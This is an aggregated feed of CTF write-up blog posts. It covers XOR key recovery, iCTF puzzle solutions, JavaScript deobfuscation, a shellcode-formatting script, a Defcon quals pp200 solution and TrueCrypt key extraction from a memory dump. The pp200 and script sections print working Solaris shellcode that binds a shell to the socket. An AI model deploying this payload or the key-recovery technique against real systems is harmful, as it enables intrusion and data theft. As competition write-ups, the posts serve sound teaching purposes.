Epic Fail

January 26, 2012

Yan Alexandrovich Shoshitaishvili

Mozilla CTF 2012 - securefilelock (challenge 1) writeup

This challenge was really fun, because it required us to go back to basics. It's a 64-bit binary, so (our version of) IDA's hexrays decompiler couldn't decompile it. Additionally, to add some old-school flavor, (our version of) FLAIR choked on Debian Wheezy's 64-bit libraries, so we didn't even apply flirt sigs. The result was some fun, old-school binary reversing! It turned out not to be very difficult, but still super fun.

When running the binary, it's pretty clear that it decrypts and dumps a file, then launches vlc to play it. Here's the output of a given run:


$ echo asdf | ./securefilelock
Welcome to Secure File Lock
Playing 'Ethereal Awakening' by Project Divinity (CC BY-NC-SA 2.5)
Please enter your password. (max length = 32):
Processing.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................


And here it is with some strace goodness:

$ echo asdf | ./securefilelock
Welcome to Secure File Lock
Playing 'Ethereal Awakening' by Project Divinity (CC BY-NC-SA 2.5)
Please enter your password. (max length = 32):
Processing.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
yans@lath|~/code/security/mozilla/sfl$ echo asdf | strace ./securefilelock
execve("./securefilelock", ["./securefilelock"], [/* 40 vars */]) = 0
uname({sys="Linux", node="lath", ...})  = 0
brk(0)                                  = 0x1028000
brk(0x10291a0)                          = 0x10291a0
arch_prctl(ARCH_SET_FS, 0x1028880)      = 0
brk(0x104a1a0)                          = 0x104a1a0
brk(0x104b000)                          = 0x104b000
fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 5), ...}) = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f53755e8000
write(1, "Welcome to Secure File Lock\n", 28Welcome to Secure File Lock
) = 28
write(1, "Playing 'Ethereal Awakening' by "..., 67Playing 'Ethereal Awakening' by Project Divinity (CC BY-NC-SA 2.5)
) = 67
write(1, "Please enter your password. (max"..., 47Please enter your password. (max length = 32):
) = 47
fstat(0, {st_mode=S_IFIFO|0600, st_size=0, ...}) = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f53755e7000
read(0, "asdf\n", 4096)                 = 5
write(1, "Processing......................"..., 680Processing.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
) = 680
getpid()                                = 7048
open("/tmp/sf.z6GiAx", O_RDWR|O_CREAT|O_EXCL, 0600) = 3
fcntl(3, F_GETFL)                       = 0x8002 (flags O_RDWR|O_LARGEFILE)
fstat(3, {st_mode=S_IFREG|0600, st_size=0, ...}) = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f53755e6000
lseek(3, 0, SEEK_CUR)                   = 0
write(3, "QT>+\t2\f\36v?k^iX\35\5I\302\f'\10cjnH~\ndhw\r+"..., 6680576) = 6680576
write(3, "H3,\27\230A\n\333l~'l#\205\4]NL,b\23\340PQ\365\354\212\205\246\333 \363"..., 1604) = 1604
close(3)                                = 0
execve("/usr/bin/vlc", ["/usr/bin/vlc", "--play-and-exit", "/tmp/sf.z6GiAx"], [/* 40 vars */]) = -1 ENOENT (No such file or directory)
exit_group(0)                           = ?

We can clearly see it writing the file and calling vlc, and by looking at IDA, we can quickly see the decryption loop at 00000000004011A7:

decryption loop
It's an xor. So now we just need to figure out what the key is, and we got the challenge. That turned out to be another fun part. As you can see in the loop above, it's looping over the file_contents (the encrypted file in .data) of length file_length (a value in .data), the value of which is 6682180. So we're looking for a 6682180-byte version of 'Ethereal Awakening' by Project Divinity. As luck would have it, googling for the name and the number produced a few results, one of which was some random torrent. We grabbed the encrypted file from memory, downloaded the torrent (file available here), and came up with the key "yciNhAh" by xoring the encrypted file with the original. Of course, we could have just xored the header (49 44 33 03 00 00 00), but what's the fun in that?

by Zardus (noreply@blogger.com) at January 26, 2012 12:35 PM

December 24, 2011

Luca Invernizzi

iCTF 2011: Challenges writeup

Hello people!
The International Capture The Flag hacking competition iCTF 2011, the biggest CTF so far, is over, and it's time for writeups!
Here's the solutions of the challenges I wrote. Hope you enjoyed them



I Read It Encoded: Challenge, 50 dirty $


I read it encoded. Can you?


Attached: IReadItEncoded
The attachment is a base64-encoded QR code in ascii art. Print it with a really tiny monospace font, decode it and you'll have the solution.
Solution: Xis4n00bs
Teams that solved it: 31/89



Where Is My Cut?: Challenge, 125 dirty $

        Hey dude,
        I just found Alexey "Donkey" Dragunov passed out in the server room, stinkin' drunk.
        Damn him... He probably freaked out for tomorrow, thinking we will never make it.
        But *we* will.
        We always do.
        I still need to "do the deed" with Monaco's tranche.
        I know the site to use for it is legitimatebiz.ictf2011.info, but I have no freakkin' clue on
        what to do there.
        You're good at this stuff. Can you help me?
        The only thing I found is the sheet of paper attached. It was sticking on the servers, sucked it
        by the fans.
        As always, you will *not* fail me.


Fun challenge. Loading http://legitimatebiz.ictf2011.info, teams first found a simple Rails websites about duck trading. It was a red herring :)
Later in the competition, I replaced it with the standard "It Works!" page of an Apache fresh install, to which I've added a single line "To add content, ssh into this machine".
Turns out people don't read the content of the "It Works!" page anymore (even if it's 3 lines): lots of hackers complained that the website was down, and were told to learn how to read :)

Following the ssh route, teams  were faced with this message:




$ ssh donkey@legitimatebiz.ictf2011.info
Host key fingerprint is 97:c5:4a:f4:7a:c1:0c:6c:3c:78:52:73:55:ce:3a:70
+--[ECDSA  256]---+
|         == .....|
|        o.*O   o |
|         +..O E o|
|         . = + . |
|        S = . o  |
|         . .   . |
|                 |
|                 |
|                 |
+-----------------+


Verification code: 

This is the prompt of the Google Authenticator PAM module for two-factor authentication.

If you didn't know that, a big hint is given by the content of the qrcode in the picture (otpauth://totp/donkey@ip-172-19-1-77?secret=JUSH3O2LQ3WSJKSC).
Using the Google Authenticator app for Android/Iphone with the QR code, and the password in the picture (GimmieMyCut), you can log in to the server.
The server's answer contains the solution.
Welcome to Ubuntu 11.10 (GNU/Linux 3.0.0-12-virtual x86_64)
[..]
ComeOnTooEasyConnection to legitimatebiz.ictf2011.info closed.
Solution: ComeOnTooEasy
Teams that solved it: 22/89

Inferno: Challenge, 250 dirty $

When I was playing around with the backdoor I deployed on Zeus' laptop,
I found that he was very interested in this page.
Discover why, and if it's worth something, you'll get a good cut.
Attached: inferno.html
A lot of people told me they loved this one :).

The attachment looked like a geological conference website, featuring pieces of the worst html I've ever written.
In the middle of that mess, an odd-looking javascript comment could be spotted:
+++++++++++++++++++++++++[>++>+++>++++>+++++<<<<-]+++++++++++++++++++++++++>>>-----------.>--------------.<<<------.<+++++++.>>---------.>>----------.+++++++++.<<<.<.>>>>------.---.+++++++++++++.<++++++++++++.<<-----.>>>+.<<<<.>>>>++++++.<++++++++++.>----.<+++.<<<.>>>---------------.>.-.<<<<.>>>+++.>-----.+++.<<<<.>>>>++.<++.---.<<<.>>>-----------.>-----------.++++..--------.+++++++++++++.-----.<+++++++.>+..<<<<.>>>>----.+++++.<+.<<<.>>>>------.+++++.<<<<.>>+++++++++++++++.>>+++++++.<-.>-------.++++++.<++++++++.------.>-----.<<<+++++++.<..>>--------.<<.>>>>----.+++.+.++++++++.<<<<.>>>>--------.-.--.+++++++++++++.<<<<.>>>>.----------.++++++.<<<<----------------------.>>>.--.>-------.<<<--------------.>>+++.+.--.>+.<+.+.<<.>>>--.<.>++++++..<----.++++++.--.>.<<<.>>>.<.>-----.++++++.<<<.>>+.>--.---.--.<<<.>>>+++++++.<++.---.<<.>>--.++++++.>--.<------.>------.<++.>+++++++.<<<.>>>----.<+.<<.>>++.---.>---..<<<++++++++++++.------------.>>>+++++++.----.<<<.>>-.>.-.<<<+++++++.>>>++++++.<<<-------.>>>.--.+++++++.<<<.>>>-----.-----.<<<.>>-.>.--.+++.----.<--.>---.+++++.<<<<.>>>.++++++.------.>-----.+++++.<<<.>>>++++++.<+++++++.-------.>.<<<.>>>+++++.----------.++++++.<<<.>>>-------.<++++.>++++++++.<.>----.<<<.>>++.>---.+++++.<<<.>>>.<+.---.<<.>>>-------.++.-.<.>+++++++++++.<<<++++++++++++++.<.>>--.>++++++++++.-----------.>------.---.<+..-.<<--.<.>------------....>--.>>--.<+++++.--.>-.<------.<<<...>++++++++.>--.-.-------.-.-.>----.>+++++++++++++++++.-.<<----.>----.>---.<<---.>---.>---.<<---.>---.>---.<--.>--.<<<++.-.>>----.<+++++++++++.<+++.-.-.-.-.-.-.-.-.-.-.-.>>>++++++++++++.-.-.-.-.-.-.<<--.-.--.>>----.<<<+.>---.>>++++++++++.--------------.<<--.>>--.-.<<----.-.>>---.-------.+++++.<<----.>>--------.<<--.<<.
Yep, it's BrainFuck. Its execution printed this

Yo, Ben, here's your cut for the Zimmermann job in Quantico.  I know only you
can decode messages sent from the circles of hell, so don't try to complain
again that you never got the money.
Godspeed,
    Enigma
(CB;:9]~}5Yz2Vw/StQr*)M:,+*)('&%$#"!~}|{zyx875t"2~p0nm,+jch'`%
The message alludes to cryptography (ZimmermanEnigma), and to hell.
What's the programming language that comes straight from the eight circle of hell, and that encrypts its instruction pointer? A quick search on wikipedia's page of esoteric programming languages leads to Malbolge (read the description, it's quite fun).
Executing the code in the Malbolge interpreter leads to the solution.
Solution: EvIl!
Teams that solved it: 22/89


Domain Hunter: Challenge, 350 dirty $

Here at iCTF HQ, we have a little ADD problem.
Seeing how cheap domain were when we registered ictf2011.info, we decided to buy another domain.
There was a bulk discount!
Cool, ha?
Except, we forgot what the domain was.
Can you find it?
SQUIRREL!
This one wasn't difficult. One of the ways it could be solved is by looking up WHOIS information for ICTF2011.INFO, and googling for a subset of those.
"Billing Name:Yan Shoshitaishvili Billing Organization: Billing Street1:2541 W. Firebrook Rd Billing Street2: Billing Street3: Billing City:Tucson Billing State/Province:Arizona " returns exactly two results:



Score! You think. Except, http://0x69637466.info/ points to a GoDaddy parking page. The solution, instead, was placed at http://www.0x69637466.info/ . Turns out, this little trick confused several people, that later contacted me on IRC to /facepalm.
SolutionI@mD@Sh3rl0k0fth31nt3rn3tz.
Teams that solved it: 39/89

by Luca Invernizzi (noreply@blogger.com) at December 24, 2011 08:18 AM

December 20, 2011

Michael Weissbacher

iCTF 2011 challenge 15 writeup (150 points)

One of my iCTF challenges was a simple JavaScript obfuscation, a backup of the code is available here. What happens is obvious, window.alert is triggered with the message “why?”. “Why” is less obvious since the code was encoded with jjencode. There are no other visible hints.

To further look into window.alert, we can overwrite the function:

window.alert = function(e) { console.log(JSON.stringify(e)); };

After re-running the code we see that window.alert is not being called with a String as argument, but with an object which contains the attribute:

{"secret":"Angelina Jolie's only good movie, in leet speak, reverse is the key"}

The solution is obviously: Hackers

FYI: Before the obfuscation the code looked like this:

var obj = { };
obj.secret = "Angelina Jolie's only good movie, in leet speak, reverse is the key";
obj.toString = function(e) { return "why?"; };
obj.toSource = function(e) { return "function toSource() {\n" +
" [native code]\n" +
"}\n"
};
window.alert(obj);

by Michael at December 20, 2011 08:31 AM

June 10, 2011

Johannes Schlumberger

Shellcode from C

As Luca has already pointed out, we spent a lot of time developing our own shellcode for the pp200. Usually a typical shellcode development environment looks like this:
void
f(void)
{
//__asm__ or C code
}
int
main()
{
f();
}
The actual code goes into the f-function either as inline assembly or C. Now the module is typically compiled, disassembled and the resulting opcodes are put in binary form, as C-array or whatever you prefer into an exploit-script. What usually costs about 1-2 minutes of time for each iteration is to format the disassembled opcodes into the format needed, no big deal but since it is scriptable it shall be done:
#!/usr/bin/python
import sys
import re

def get_code():
code = []
lines = sys.stdin.readlines()
pattern = re.compile('.*:\s+(([0-9a-f]{2} | [0-9a-f]{2})+)($|\s\s\s\s+.*)')
hexpat = re.compile('([0-9a-f]{2})')
for i in lines:
i = i.rstrip('\n')
match = re.search(pattern, i)
if match:
match = re.findall(hexpat, match.group(1))
for byte in match:
code.append(int(byte, 16))
else:
raise Exception('line "%s" did not match expected format' % (i))
return code

def write_binary(code):
for byte in code:
sys.stdout.write("%c" % byte)

def write_c_arr(code):
sys.stdout.write('static char code [] = "')
for byte in code:
sys.stdout.write("\\x%02x" % byte)
sys.stdout.write('";\n')

def write_python_string(code):
sys.stdout.write('code = "')
for byte in code:
sys.stdout.write("\\x%02x" % byte)
sys.stdout.write('"\n')

def usage(name):
print "%s \npossible modes:\n\t-b binary (default)\n\t-p python\n\t-c C\n\ninput is read from stdin" % name

def main():
if len(sys.argv) == 2 and (sys.argv[1] == '-h' or sys.argv[1] == '--help'):
usage(sys.argv[0])
sys.exit(0)
code = get_code()
if len(sys.argv) == 2:
if sys.argv[1] == '-b':
write_binary(code)
elif sys.argv[1] == '-p':
write_python_string(code)
elif sys.argv[1] == '-c':
write_c_arr(code)
else:
write_binary(code)

if __name__ == '__main__':
main()

You simply pipe or paste the output of objdump -D into the script and it outputs the opcodes in raw binary form, as C-array or python-string.
Plugging in our solaris shellcode gives us:
shell_code.py -c                            
80483a6: 90 nop
80483a7: 31 d2 xor %edx,%edx
80483a9: 31 db xor %ebx,%ebx
80483ab: 31 ff xor %edi,%edi
80483ad: 31 c9 xor %ecx,%ecx
80483af: b3 09 mov $0x9,%bl
80483b1: 66 bf 3e 00 mov $0x3e,%di
80483b5: b1 05 mov $0x5,%cl
80483b7: 52 push %edx
80483b8: 53 push %ebx
80483b9: 51 push %ecx
80483ba: 52 push %edx
80483bb: 89 f8 mov %edi,%eax
80483bd: cd 91 int $0x91
80483bf: 6a 01 push $0x1
80483c1: 53 push %ebx
80483c2: 51 push %ecx
80483c3: 52 push %edx
80483c4: 89 f8 mov %edi,%eax
80483c6: cd 91 int $0x91
80483c8: 6a 02 push $0x2
80483ca: 53 push %ebx
80483cb: 51 push %ecx
80483cc: 52 push %edx
80483cd: 89 f8 mov %edi,%eax
80483cf: cd 91 int $0x91
80483d1: 31 c0 xor %eax,%eax
80483d3: 50 push %eax
80483d4: 68 6e 2f 73 68 push $0x68732f6e
80483d9: 68 2f 2f 62 69 push $0x69622f2f
80483de: 89 e3 mov %esp,%ebx
80483e0: 50 push %eax
80483e1: 53 push %ebx
80483e2: 89 e2 mov %esp,%edx
80483e4: 50 push %eax
80483e5: 52 push %edx
80483e6: 53 push %ebx
80483e7: b0 3b mov $0x3b,%al
80483e9: 50 push %eax
80483ea: cd 91 int $0x91
static char code [] = "\x90\x31\xd2\x31\xdb\x31\xff\x31\xc9\xb3\x09\x66\xbf\x3e\x00
\xb1\x05\x52\x53\x51\x52\x89\xf8\xcd\x91\x6a\x01\x53\x51\x52\x89\xf8\xcd\x91\x6a\x02
\x53\x51\x52\x89\xf8\xcd\x91\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89
\xe3\x50\x53\x89\xe2\x50\x52\x53\xb0\x3b\x50\xcd\x91";
This script can be used with metasploit's msfvenom to create shellcode that is for example also free of zerobytes and newlines and has a 200 byte nop-sled prepended:
shell_code.py | ./msfvenom -p - -n 200 -b '\x00\x0a' -f c

by spjsschl (noreply@blogger.com) at June 10, 2011 12:10 PM

June 06, 2011

Luca Invernizzi

Defcon Quals 19: Pwtent Pwnable 200 (pp200) writeup

Here's how the pp200 challenge has been solved by the  Shellphish team (by Manuel, Johannes, Don and I).
For this challenge, we were given an address/port and a file, which was a Solaris executable.
Opened in IDA, the executable turned out to be a simple forking server.   For each incoming TCP connection, if the source port is in the 5000-6000 range, 73 bytes are read and then executed (except the first byte).
The child thread just executed this:

int __cdecl client_callback(int fd)
{
void *v1; // esp@1
uint16_t v2; // ax@3
int v4; // [sp+0h] [bp-38h]@1
int execute_buf; // [sp+Ch] [bp-2Ch]@1
int *v6; // [sp+10h] [bp-28h]@1
int v7; // [sp+14h] [bp-24h]@6
void (*execute_the_buffer)(void); // [sp+18h] [bp-20h]@1
socklen_t len; // [sp+1Ch] [bp-1Ch]@1
struct sockaddr addr; // [sp+20h] [bp-18h]@1

v6 = &v4;
v1 = alloca(16 * ((unsigned int)(BUFSIZE + 30) >> 4));
execute_buf = 16 * ((unsigned int)((char *)&execute_buf + 3) >> 4);
execute_the_buffer = (void (*)(void))(16 * ((unsigned int)((char *)&execute_buf + 3) >> 4) + 1);
len = 16;
if ( getpeername(fd, &addr, &len) == -1 )
exit(-1);
v2 = ntohs(*(uint16_t *)&addr.sa_data[0]);
printf("port: %d \n\n\n", v2);
if ( ntohs(*(uint16_t *)&addr.sa_data[0]) > 0x1387u && ntohs(*(uint16_t *)&addr.sa_data[0]) <= 0x1770u )
exit(-1);
v7 = readAll(fd, execute_buf, BUFSIZE);
printf("read %d bytes\n\n\n", v7);
execute_the_buffer();
return 0;
}
So, we needed to send a shellcode shorter than 72 bytes. Unfortunately, Metasploit was of little help here, so we had to scout the web looking for suitable candidates. After several cases of it-work-on-our-VM-but-not-at-DDtek, we decided to roll our own.

Here it is: it spawns a shell using the TCP connection file descriptor as stdin, stdout and stderr.

#include <stdio.h>
#include <sys types.h>
#include <unistd.h>
#include <fcntl.h>

void f(void);
int
main(int argc, char **argv)
{
f();
}
void f(void)
{
__asm__(
//padding
"nop \n"
//dup 0 into 5
"xor %edx, %edx \n"
"xor %ebx, %ebx \n"
"xor %edi, %edi \n"
"xor %ecx, %ecx \n"
"mov $9, %bl \n"
"mov $62, %di \n"
"mov $5, %cl \n"
"push %edx \n"
"push %ebx \n"
"push %ecx \n"
"push %edx \n"
"mov %edi, %eax \n"
"int $0x91 \n"
//dup 1 into 5
"push $1 \n"
"push %ebx \n"
"push %ecx \n"
"push %edx \n"
"mov %edi, %eax \n"
"int $0x91 \n"
//dup 2 into 5
"push $2 \n"
"push %ebx \n"
"push %ecx \n"
"push %edx \n"
"mov %edi, %eax \n"
"int $0x91 \n"
// //close stdin
// "push %edx \n"
// "push %edx \n"
// "incl %ecx \n"
// "mov %ecx, %eax \n"
// "int $0x91 \n"
//shell
"xorl %eax,%eax \n"
"pushl %eax \n"
"pushl $0x68732f6e \n"
"pushl $0x69622f2f \n"
"movl %esp,%ebx \n"
"pushl %eax \n"
"pushl %ebx \n"
"movl %esp,%edx \n"
"pushl %eax \n"
"pushl %edx \n"
"pushl %ebx \n"
"movb $0x3b,%al \n"
"pushl %eax \n"
"int $0x91 \n"
);
}



 Total: 69 bytes (and 1 for padding)
\x90\x31\xd2\x31\xdb\x31\xff\x31\xc9\xb3\x09\x66\xbf\x3e\x00\xb1\x05\x52\x53\x51\x52\x89\xf8\xcd\x91\x6a\x01\x53\x51\x52\x89\xf8\xcd\x91\x6a\x02\x53\x51\x52\x89\xf8\xcd\x91\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe2\x50\x52\x53\xb0\x3b\x50\xcd\x91
That's it. For future reference, here's the mapping between the familiar Debian commands and the OpenSolaris ones that were useful in the competition.

  • apt-cache search  => pkg search
  • apt-get install => pkg install
  • strace => truss (strace didn't appear to work)


Ciao!


ps: EpicFail (which is part of the ShellPhish team) just opened a blog on hacking.

by Luca Invernizzi (noreply@blogger.com) at June 06, 2011 11:22 AM

May 18, 2011

Michael Weissbacher

PlaidCTF Writeup: Fun with Firewire

This is a writeup of the PlaidCTF 500 pts challenge “Fun with Firewire”.

###############
Description:
Category: forensics

All of the machines at the AED office are encrypted using the amazing TrueCrypt software.
When we grabbed one of their USB sticks from a computer, we also grabbed the memory using the Firewire port.

Recover the key using the truecrypt image and the memory dump.

http://www.plaidctf.com/chals/81d9467f812d2fbb32e9d4b915cccfe457245f25.tar.bz2

###############

 

Introduction

Given is a memory dump (128 MB) of a running Windows XP SP3 machine as well as a 32 MB file containing random data (a TrueCrypt volume image, according to the problem description). The memory dump was supposedly extracted via the Firewire port: The Firewire specification allows devices to have full DMA access. This allows forensic analysts (or a malicious hacker)  to plug into any running computer that has a Firewire port and gain full access to the machine within seconds. Papers describing the attack and tools can be found at http://www.hermann-uwe.de/blog/physical-memory-attacks-via-firewire-dma-part-1-overview-and-mitigation. A different way to get a dump of the memory would be to conduct a “cold boot attack” as described in this paper: http://citp.princeton.edu/pub/coldboot.pdf.

Overview

To get an overview of the memory dump we inspect it with volatility. We see that TrueCrypt was running at the moment the dump was taken … good.

Further inspection of the memory dump reveals that the Operating System is Windows XP SP3, and the latest version of TrueCrypt (7.0a) is used. We reconstruct the setup by launching a VirtualBox installation, and we extract the memory using Mantech Memory Dumper mdd http://sourceforge.net/projects/mdd/. TrueCrypt offers the possibility to cache the passwords for mounting encrypted volumes. Comparing different memory dumps let us conclude that password caching was not enabled in the TrueCrypt software.

We briefly summarize the relevant technical details of TrueCrypt. More information can be found at http://www.truecrypt.org/docs/. In order to mount an encrypted volume, TrueCrypt uses the password and/or one or more key-files in order to decrypt the header (first 512 bytes of the volume). If the header gets correctly decrypted (a magic cookie is found), TrueCrypt reads the configuration (encryption algorithm and mode, etc.) as well as the master and secondary key into memory, and safely overwrites the memory regions where the password / key-file location was stored. The extracted master and secondary key is used for any further encryption and decryption of data. Since the data is encrypted and decrypted on the fly, these keys remain in memory. (Note that recent papers suggest storing the keys in CPU registers, more specifically in SSE registers http://portal.acm.org/citation.cfm?id=1752053 or in MSR registers  http://arxiv.org/abs/1104.4843 instead of in the RAM in order to mitigate against these attacks.).

The default cipher used by TrueCrypt is AES in XTS mode which uses two 256 Bit AES-keys. We have to locate these keys in the memory dump. One option would be to analyze the data-structures and locate the memory region where TrueCrypt stores the keys. But it is easier to use a generic approach to locate AES keys since a tool for that task was already written for the “cold boot attack”-research by Jacob Applebaum: AESKeyFinder http://citp.princeton.edu/memory/code/.

Once we have the right keys, we replace the header of the encrypted volume with the header of an identical volume which we created and where we set the password (so that TrueCrypt starts the mounting process correctly), but have TrueCrypt patched so that it uses the extracted keys from the memory dump instead of the ones from the newly generated header.

Finding the keys

AESKeyFinder inspects memory dumps (or actually any kind of files) and performs a simple heuristic to estimate entropy. The tool targets the expanded AES keys and tests whether a contiguous region in memory satisfies the constraints of a valid AES key schedule https://secure.wikimedia.org/wikipedia/en/wiki/Rijndael_key_schedule.

So we run the tool in verbose mode:

##########################

./aeskeyfind physmem.bin -qv
FOUND POSSIBLE 256-BIT KEY AT BYTE 1166008

KEY: f0cbf260e0ca8ec2431089fb393a1c29513aaaa5847d13e8be84760968e64dc6

EXTENDED KEY:
f0cbf260e0ca8ec2431089fb393a1c29
513aaaa5847d13e8be84760968e64dc6
7f2846259fe2c8e7dcf2411ce5c85d35
88d2e6330caff5dbb22b83d2dacdce14
c0a3bc725f41749583b33589667b68bc
bbf3a356b75c568d0577d55fdfba1b4b
300c0fec6f4d7b79ecfe4ef08a85264c
c564547f723802f2774fd7ada8f5cce6
de47812eb10afa575df4b4a7d77192eb
cbc71b96b9ff1964ceb0cec96645022f
a030941d113a6e4a4ccedaed9bbf4806
dfcf49f96630509da8809e54cec59c7b
26eeb59637d4dbdc7b1a0131e0a54937
3ec9726358f922fef079bcaa3ebc20d1
03598b24348d50f84f9751c9af3218fe

CONSTRAINTS ON ROWS:
0000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000
a4ba4e5eec12a4d672ca77143c4062874ae580efb9fe97bde3b3e6a81897e19b
1c2d49fc319ab86e317a676a77adecd005c26ac2f92330f4bf57e7fd25517be4
f0887dbdb886bbce1d09192c46d78bba7767303042f20f9e97f4a2ee9a069c19
896fc79ff18f46ec0300545c5bde9296ad29fd8abf019cbcc4286d680df23ef7
374fb5bf43bcc26f310dd6dd58dec6ca33047ae03810315e969c3149c9da539f
2d01ca16d2ec47826d5b7f7b69d31017a8d05433be7447d9e50989fc5f4662d6
461e700719d173152baa731904886f6c53e82a369c82e066c6575955a70678ed

FOUND POSSIBLE 256-BIT KEY AT BYTE 11674d4

KEY: 9b18635534875fc2ba1a74616e961caaaa907d8b285c7625bb44eb256b8de59d

EXTENDED KEY:
9b18635534875fc2ba1a74616e961caa
aa907d8b285c7625bb44eb256b8de59d
c7c13d2af34662e8495c168927ca0a23
66e41aad4eb86c88f5fc87ad9e716230
666b3921952d5bc9dc714d40fbbb4763
690eba5627b6d6ded24a51734c3b3343
80a82308158578c1c9f43581324f72e2
4a8aface6d3c2c10bf767d63f34d4e20
6b8794057e02ecc4b7f6d94585b9aba7
dddc9892b0e0b4820f96c9e1fcdb87c1
c290ecb5bc9200710b64d9348edd7293
c41dd84e74fd6ccc7b6ba52d87b022ec
050322a2b99122d3b2f5fbe73c288974
2f297fdc5bd4131020bfb63da70f94d1
33211cfe8ab03e2d3845c5ca046d4cbe

CONSTRAINTS ON ROWS:
0000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000
d9ea24470c5bf1b15f3fe8d33eb683089a7ff9f198bb75cd3d2d8bed76e54625
f3acc19f88a6775a9e5c1d35828683225f9eebc3f912bd22c286ca034f297f9f
60f8969f3f106db49ffe4e6b1cda9e1776e957cf4dc7c9544c8871c38dafb59c
05a596765f1e018fb150a1bf8324d07caadd339decc14ac9b02f10f1c127c45f
5738b9015cbe40304bcdd62f327471c33b9672c7ada60c16d749078f7108d4ae
ca866774b97f05196d03a57579b9a7ec241885799511a598317b9cd2a641d321
b0823347a1175dd64d710fca14ba0299489e0a17bc3d358e83c3ff1b3c9ac97e

FOUND POSSIBLE 256-BIT KEY AT BYTE 7d852cc

KEY: 000102030405060708090a0b0c0d0e0f101112131415161718191a1b1c1d1e1f

EXTENDED KEY:
000102030405060708090a0b0c0d0e0f
101112131415161718191a1b1c1d1e1f
a573c29fa176c498a97fce93a572c09c
1651a8cd0244beda1a5da4c10640bade
ae87dff00ff11b68a68ed5fb03fc1567
6de1f1486fa54f9275f8eb5373b8518d
c656827fc9a799176f294cec6cd5598b
3de23a75524775e727bf9eb45407cf39
0bdc905fc27b0948ad5245a4c1871c2f
45f5a66017b2d387300d4d33640a820a
7ccff71cbeb4fe5413e6bbf0d261a7df
f01afafee7a82979d7a5644ab3afe640
2541fe719bf500258813bbd55a721c0a
4e5a6699a9f24fe07e572baacdf8cdea
24fc79ccbf0979e9371ac23c6d68de36

CONSTRAINTS ON ROWS:
0000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000
6948172fbb0d7ded3b16ce30696cda326d54b8480a0e0a0e0a0e0a0e0a0e0a0e
b29a81a5000000000000000000000000720676bd000000000000000000000000
69b5cd83000000000000000000000000fec82ba5000000000000000000000000
58fbba6f000000000000000000000000e2d69177000000000000000000000000
1fe3a63900000000000000000000000031467b85000000000000000000000000
b6a85bf0000000000000000000000000deaed73f000000000000000000000000
7cdc8bf900000000000000000000000045804db8a3b9352ffd620c9386f2fa8e
##########################

 

The “constraint on rows”-output tells us that the expanded keys are valid according to the AES key schedule. If we had bit errors in the respective memory regions (likely in cold boot attacks), not all constraints would have been met and AESKeyFinder would have calculated a guess for the original valid key.

So we have three keys after only a few of seconds of runtime – so far so good.

  1. f0cbf260e0ca8ec2431089fb393a1c29513aaaa5847d13e8be84760968e64dc6
  2. 9b18635534875fc2ba1a74616e961caaaa907d8b285c7625bb44eb256b8de59d
  3. 000102030405060708090a0b0c0d0e0f101112131415161718191a1b1c1d1e1f
The entropy of (3) is really low, and we can definitely exclude it if we assume TrueCrypt is not totaly broken. This is good news since we have exactly two remaining 256-bit AES keys, as used by TrueCrypt in default configuration (AES in XTR mode).

Patching TrueCrypt

Next we read the source of TrueCrypt. Remember that TrueCrypt first decrypts the header with the password, and then reads the AES-key from the decrypted header. Reading in the header is done in Volume/VolumeHeader.cpp:VolumeHeader::Deserialize(.,.,.). We patch the code there, right after the master and secondary key was read from the decrypted header, and replace it with the hard-coded key value we found in the previous step. Our quick and dirty patch looks as follows:
--- truecrypt-7.0a-source/Volume/VolumeHeader.cpp
+++ truecrypt-7.0a-source.patched//Volume/VolumeHeader.cpp
06:00:20.000000000 -0700
@@ -6,6 +6,10 @@
+#include <iostream>
+#include <cstdlib>
+#include <cstdio>
+#include <fstream>
#include "Crc32.h"
#include "EncryptionModeXTS.h"
#include "Pkcs5Kdf.h"
@@ -201,8 +206,19 @@ namespace TrueCrypt
 

if (typeid (*mode) == typeid (EncryptionModeXTS))
{
-                       ea->SetKey (header.GetRange (offset, ea->GetKeySize()));
-                       mode->SetKey (header.GetRange (offset + ea->GetKeySize(), ea->GetKeySize()));
+
+                       char * buffer = (char *)malloc(65);
+                       buffer[64] = ‘\x00′;
+                       memcpy(buffer, “\xf0\xcb\xf2\x60\xe0\xca\x8e\xc2\x43\x10\x89\xfb\x39\x3a\x1c\x29\x51\x3a\xaa\xa5\x84\x7d\x13\xe8\xbe\x84\x76\x09\x68\xe6\x4d\xc6\x9b\x18\x63\x55\x34\x87\x5f\xc2\xba\x1a\x74\x61\x6e\x96\x1c\xaa\xaa\x90\x7d\x8b\x28\x5c\x76\x25\xbb\x44\xeb\x25\x6b\x8d\xe5\x9d”, 64);
+                       //ea->SetKey (header.GetRange (offset, ea->GetKeySize()));
+
+                       ConstBufferPtr cbp = (ConstBufferPtr( (TrueCrypt::byte*) buffer, 32));
+                       ea->SetKey (cbp);
+
